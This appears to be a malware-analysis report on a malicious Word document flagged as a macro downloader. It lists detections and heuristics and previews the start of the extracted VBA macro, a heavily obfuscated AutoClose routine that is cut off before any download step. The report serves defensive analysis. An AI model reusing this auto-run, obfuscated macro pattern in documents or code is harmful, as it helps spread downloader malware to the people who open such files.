MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro that triggers on AutoClose. Heuristics indicate the macro uses GetObject and has auto-execution tokens, suggesting it's designed to download and run a secondary payload. ClamAV detection confirms its malicious nature as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.Valyria-6595163-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Valyria-6595163-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 43972 bytes |
SHA-256: bb98904761630c7e97e72ec31fc15c924c953a8260ca9ef0033e293ae4856c58 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoClose()
teWoTOjeCiwaS = Val("20563") & "nEmOJeWEmIlYs"
huFojenAcE = "aoTCeQug"
oxmysuLUfuagOTi = Val("73447") & "mydetIjYnOd"
Dim beFruvqYlPaWO
For beFruvqYlPaWO = 10 To 11
Dim VIQYFYHfakYbi
VIQYFYHfakYbi = Fix(63357)
Next
On Error Resume Next
FNAFiCUqICDUVy = Val("5826") & "XyCNOFAGYzUZ"
Dim CAhotaXERYW
Dim nEWYwYNUjETUs
nEWYwYNUjETUs = 24650
GYhyzowUk = 29669
Dim gOvawUXOxyiitYz
For gOvawUXOxyiitYz = 3 To 10
Dim MTenAQadyBuvIlipoJ
MTenAQadyBuvIlipoJ = Fix(98845)
Next
For CAhotaXERYW = 2 To 10
SotEdidkoPUfuKqI = Val("93768") & "nEhunIcUaOqelUdUZuhowa"
Dim LAmyTyjIW
LAmyTyjIW = 81683
vAwidepumidyX = Val("22468") & "JojyZToTiiISOHuz"
Dim HNEzImuqILAnuqOFY
HNEzImuqILAnuqOFY = Fix(37548)
Next
PuVuXYdUMy = Val("57211") & "zuBAtiiEqAqOv"
WIBoPisOWymOXIjAmabac = Val("91367") & "GOhyKolerUg"
XIrYJYKUdUg = "lUMYkOZOiURuqyPU"
MAriVuKYqyaUJyC = 59591
Dim fixYmuhIW
fixYmuhIW = 45271
KOliLODUpULaLi = "suBaMIsIdAKECymyq"
JYXewUkIBIP = "dIkUDovAxeYKAP"
mOdEaOHyvyseWuLeaoX = "qwYnAaaSIDOBOjykAv"
WaQiCAxaAsvXIpUmuBA = "fUViZUBUQyqIdlO"
Dim iiKAzazubiVuv
iiKAzazubiVuv = 41225
DoLyMutEWAwOv = Val("42089") & "tuVFewij"
qyLoKACaP = 38885
DAaaqofeiujoQdYtUBatY = 34818
wLaiyfoGNOJe = "pETOXAXUkUPUK"
BUCUHoTvXURozIdiwYV = StrReverse("")
Dim namaFIfzenULEHETitYn
namaFIfzenULEHETitYn = 786
Dim iOniYCIMoCYRf
For iOniYCIMoCYRf = 5 To 13
Dim cOnYtUGIDYtuc
cOnYtUGIDYtuc = 70145
dUkuPEFiLURIGELYdCuj = "dYpOMaHoF"
Dim pUFizelEWEpiruY
Dim bAdOcESopucarIFETuSoV
bAdOcESopucarIFETuSoV = 73163
PIRoTEsAQejIuusAvIXE = 64162
aFisipuqURaxExOHyhYA = Val("20195") & "jUBetUSIaOs"
pUFizelEWEpiruY = Fix(48105)
vodiDIMAFiV = "dApasUNOOdiJoCepeFo"
Next
Dim XETZeZaPIHUxiFoNohYX
For XETZeZaPIHUxiFoNohYX = 10 To 12
Dim lNaCuDUzE
lNaCuDUzE = Fix(2252)
Next
JENYnEVuNhIsE = Val("80308") & "oSvIdTUbYi"
Dim qAxAQagUxYnatada
qAxAQagUxYnatada = 55311
VUzUbifEIrOSvaNEf = 83287
Dim CyzafahiG
For CyzafahiG = 8 To 10
Dim veMeWLokOpiKEFOC
TYlOvArEBABUCi = 38044
BIZiBEkYhYXEWeZiwu = Val("27148") & "WeDiSOqOvYGYkHi"
VorAjEQOHIWIh = Val("83134") & "tuVotoXupIa"
veMeWLokOpiKEFOC = Fix(12927)
Next
BYScEiurU = Val("15610") & "jiNedEluCa"
Dim aYLOGOBjOGOtOiExiHu
aYLOGOBjOGOtOiExiHu = 42174
Dim MoseniwikoWiaIs
MoseniwikoWiaIs = 22036
aAjAQiuSerE = Val("96582") & "iutesUXvUaTuHU"
Dim ZYZOzydabyj
Dim bOQUTumyGygUmu
For bOQUTumyGygUmu = 4 To 12
Dim TypIguHUQYliBisU
TypIguHUQYliBisU = Fix(1866)
Next
diCEkagAGYeZyCoBehi = "jyzyhecAgUpoWiSabiZ"
ZYZOzydabyj = 89420
Dim pIBuCytimiJUFEdiM
Dim aeqimUredeBnoBuMUNug
For aeqimUredeBnoBuMUNug = 3 To 10
Dim PuhUKiNyHOpOwI
PuhUKiNyHOpOwI = Fix(33558)
Next
JbGiFOtUOXyLo = 31190
pIBuCytimiJUFEdiM = 51368
lbYnuxeDihogESyTe = Val("11633") & "tUsIaApY"
DHAmOvUlaK = 44970
Dim vuJUgokfIKYR
vuJUgokfIKYR = 56144
golOiIjwYRmuqOTuw = Val("37872") & "NabAKIRybiREdYba"
XEpIpyFYBELyL = Val("9082") & "piKinycuN"
VybUbeCIFoZoqeCynoM = "JesAPYToseZElEgYnuTUQE"
aUxaVaHEpInojiBy = 93273
ZEWIROjii = Val("55000") & "DANAtyvEZUg"
DACyCOTYtAFukOxIko = Val("3758") & "JEdYWaArurYUzobaN"
Dim sAHofisObDIXycimELiD
kUWiNeMuPuf = "qYpoZiBUNuFISuwAbos"
HauTYDIK = "divohovazuKIFAbuqU"
sAHofisObDIXycimELiD = 85095
Dim FaWYWIPYxUaUxEXxe
For FaWYWIPYxUaUxEXxe = 6 To 11
Dim aYiUSOrYFvEQE
aYiUSOrYFvEQE = Fix(50703)
Next
BAbInilOxu = "LYWaQEZOlakoMAhAGY"
Dim danUxOXaRogOHaPyNIDis
danUxOXaRogOHaPyNIDis = 17555
Dim KyfVeLolEzawEWe
KyfVeLolEzawEWe = 11381
Dim MekeqYSoxorehu
For MekeqYSoxorehu = 3 To 11
Dim fONUkiHUBokIPakuFAb
NuXYiaozATInUZWEdI = 84936
CAHaNiqubeX = Val("97140") & "gOPohOJYpYRa"
fONUkiHUBokIPakuFAb = Fix(91995)
Next
ZUwuVOxEtikeaeJESuSEmu = Val("51930") & "GSoRMOQaNKeao"
Dim WASUX
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.